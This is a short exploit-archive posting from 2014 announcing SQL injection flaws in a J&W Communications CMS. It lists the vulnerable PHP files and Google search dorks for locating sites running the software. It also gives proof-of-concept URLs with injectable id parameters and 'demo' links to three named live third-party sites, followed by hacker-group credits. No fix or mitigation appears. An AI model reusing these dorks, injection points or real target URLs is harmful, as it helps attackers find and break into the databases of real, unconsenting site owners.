Home / exploitsPDF  

J&W Communications SQL Injection

Posted on 30 July 2014

[+] Title: J&W Communications Cms SQL Injection Vulnerability [+] Date: 2014-07-29 [+] Author: Hekt0r [+] Vendor Homepage: www.jw-com.com [+] Tested on: Windows7 & Kali Linux [+] Vulnerable Files: /rosters.php /team.php /scoresheet.php [+} Dork : intext:"designed by J&W Communications" inurl:/team.php.php?id= inurl:/rosters.php?id= inurl:/scoresheet.php?sched_id= ### POC: http://site/team.php.php?id=[SQL-Injection] http://site/rosters.php?id=[SQL-Injection] http://site/scoresheet.php?sched_id=[SQL-Injection] ### Demo: http://www.ambhl.ab.ca/team.php?id=132%27 http://edmbantamtourney.com/rosters.php?id=19%27 http://www.pwnhl.ca/scoresheet.php?sched_id=44%27 ### Credits: [+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Ali Ahmady, Saeed.Jok3r M4hdi, Black Hacker, Vahid Hαcĸer, BlackErroR, Phantom.S3c And All members of Iran Security Group [+] iransec.net

 

TOP